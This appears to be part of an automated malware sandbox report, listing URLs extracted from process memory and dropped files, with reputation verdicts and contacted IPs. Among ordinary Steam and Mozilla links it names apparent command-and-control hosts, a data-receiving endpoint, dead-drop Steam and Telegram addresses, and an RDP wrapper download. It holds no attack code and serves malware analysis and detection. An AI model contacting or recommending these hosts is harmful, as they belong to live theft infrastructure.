https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.JKFCAF	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hansgborn.eud	BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/badges	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	true	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://stascorp.com/load/1-1-0-62	RDPWInst.exe, 00000016.00000000.2818017493.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.15.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162h;	RegAsm.exe, 0000000E.00000002.3291876197.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://reinforcenh.shop/	RegAsm.exe, 0000000B.00000002.2876092064.000000000121E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, GIJEGDAKEH.exe, 0000000C.00000002.2775997057.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162	76561199780418869[1].htm.3.dr	false	Avira URL Cloud: malware	unknown
http://cowod.hopto	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/F_	RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://ballotnwu.site/apik	RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162GIJDH	RegAsm.exe, 0000000E.00000002.3291876197.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privac	RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered	RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/ae5ed	file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, GIJEGDAKEH.exe, 0000000C.00000002.2775997057.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	RegAsm.exe, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162.exe	RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://mozilla.org0/	RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	BKJKEBGDHD.exe, 0000000F.00000002.3052446912.0000000002DB0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/f	RegAsm.exe, 00000003.00000002.2843926018.0000000001555000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/C	RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.entrust.net/rpa03	file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/B	RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://github.com/lontivero/Open.Nat/issuesOAlso	BKJKEBGDHD.exe, 0000000F.00000002.3052446912.0000000002DB0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	IJKFII.3.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hoptoHJKFCAF	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	CFBAKK.3.dr	false	URL Reputation: safe	unknown
https://hansgborn.eu/receive.phpd	BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	CFBAKK.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	JKECGH.3.dr	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://stascorp.comDVarFileInfo$	BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/;_	RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	JKECGH.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.orgCAF	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869z	RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://cowod.BKFIDHJKFCAF	RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://www.entrust.net/rpa0	file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/msvcp140.dllh	RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.77.130	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
8.46.123.33	unknown	United States	62713	AS-PUBMATICUS	true
